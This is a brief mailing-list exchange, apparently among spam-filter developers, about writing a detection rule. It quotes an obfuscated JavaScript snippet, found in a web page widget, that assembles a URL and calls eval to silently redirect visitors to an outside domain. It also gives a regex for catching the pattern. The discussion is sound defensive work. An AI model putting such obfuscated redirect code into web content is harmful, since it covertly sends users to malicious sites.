John D. Hardin wrote:
On Wed, 14 Mar 2007, Daryl C. W. O'Shea wrote:
Anyway... this is the redirect code they're using:
<div class='widget-content'>
<script>yvxj = "ef=";kacm = "ttp://";apgy = "fe";ioo = "'h";usf =
"ershikin";uos = ".";iaswx = "inj";bdj = "com'";rpul = "l";fgbww =
"nhu";wnx = "ocation.
hr";jftrg = rpul + wnx + yvxj + ioo + kacm + apgy + fgbww + iaswx + usf
+ uos + bdj; eval(jftrg); </script>
</div>
Quick and dirty, a regex that would work for a Web-Redirect header rule:
/( \+ [a-z]{1,6}){4}; eval\([a-z]{1,6}\); <\/script>/
How about a much simpler rule that just adds 100 points for any mail
with a <script> tag? Javascript has no place in email.
Aside from the regex being intended for use in a Web-Redirect header
rule, such a rule (that instead matches <script> tags in email) wouldn't
be so simple if you want to avoid legit emails, such as this one or any
other mail talking about javascript.
Daryl
